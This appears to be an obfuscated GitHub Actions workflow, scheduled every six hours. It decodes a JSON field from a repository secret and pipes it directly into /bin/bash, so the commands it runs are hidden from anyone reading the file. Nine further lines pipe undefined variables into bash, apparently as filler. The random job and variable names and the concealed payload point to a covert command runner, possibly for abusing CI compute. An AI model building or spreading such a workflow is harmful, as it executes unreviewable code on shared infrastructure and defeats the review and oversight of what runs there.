name: celeste4349junior

on:
  workflow_dispatch:
  schedule:
    - cron: '24 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: celeste4349junior
        env:
          ine5843: ${{ secrets.ine5843 }}
        run: |
          echo $ine5843 | jq -r .gmfbp2 | /bin/bash
          echo $y6 | jq -r .gj44 | /bin/bash
          echo $pfpbu3009 | jq -r .nerky42 | /bin/bash
          echo $lnnf3740 | jq -r .cjro0638 | /bin/bash
          echo $rmtb8 | jq -r .qdhwh5961 | /bin/bash
          echo $sr62279 | jq -r .jxzow505 | /bin/bash
          echo $ppljt5 | jq -r .a65680 | /bin/bash
          echo $nr65 | jq -r .ap5 | /bin/bash
          echo $yjih228 | jq -r .kwat4310 | /bin/bash
          echo $i382 | jq -r .jqf26807 | /bin/bash

